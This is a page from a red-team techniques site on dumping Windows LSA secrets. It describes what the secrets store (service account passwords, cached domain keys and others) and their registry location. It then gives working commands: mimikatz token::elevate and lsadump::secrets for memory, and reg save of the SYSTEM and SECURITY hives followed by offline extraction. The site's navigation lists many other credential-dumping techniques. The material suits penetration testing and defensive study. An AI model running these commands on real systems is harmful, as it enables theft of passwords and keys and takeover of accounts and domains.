Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
About /?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Dumping Credentials from Lsass.exe Process Memory
Dumping Lsass.exe to Disk Without Mimikatz and Extracting Credentials
Dumping LSASS without Mimikatz with MiniDumpWriteDump == Reduced Chances of Getting Flagged by AVs
Security Accounts Manager
Dumping LSA Secrets
Dumping and Cracking mscash - Cached Domain Credentials
NTDS - Domain Controller
Dumping Domain Controller Hashes via wmic and Shadow Copy
Network vs Interactive Logons
Reading DPAPI Encrypted Secrets with Mimikatz and C++
T1214: Credentials in Registry
T1174: Password Filter
Forcing WDigest to Store Credentials in Plaintext
Dumping Delegated Default Kerberos and NTLM Credentials w/o Touching LSASS
Lateral Movement
Persistence
Exfiltration
miscellaneous
Process Environment Block
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Dumping LSA Secrets

What is stored in LSA secrets?

Originally, the secrets contained cached domain records. Later, Windows developers expanded the application area for the storage. At this moment, they can store PC users' text passwords, service account passwords (for example, those that must be run by a certain user to perform certain tasks), Internet Explorer passwords, RAS connection passwords, SQL and CISCO passwords, SYSTEM account passwords, private user data like EFS encryption keys, and a lot more. For example, the NL$KM secret contains the cached domain password encryption key.

Storage

LSA Secrets are stored in registry:

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

Execution

Memory

Secrets can be dumped from memory like so:

[email protected]
token::elevate
lsadump::secrets

Registry

LSA secrets can be dumped from registry hives likes so:

[email protected]
reg save HKLM\SYSTEM system & reg save HKLM\security security
[email protected]
lsadump::secrets /system:c:\temp\system /security:c:\temp\security

References

​

Previous
Security Accounts Manager
Next
Dumping and Cracking mscash - Cached Domain Credentials
Last updated -6
Contents
Storage
Execution
Memory
Registry
References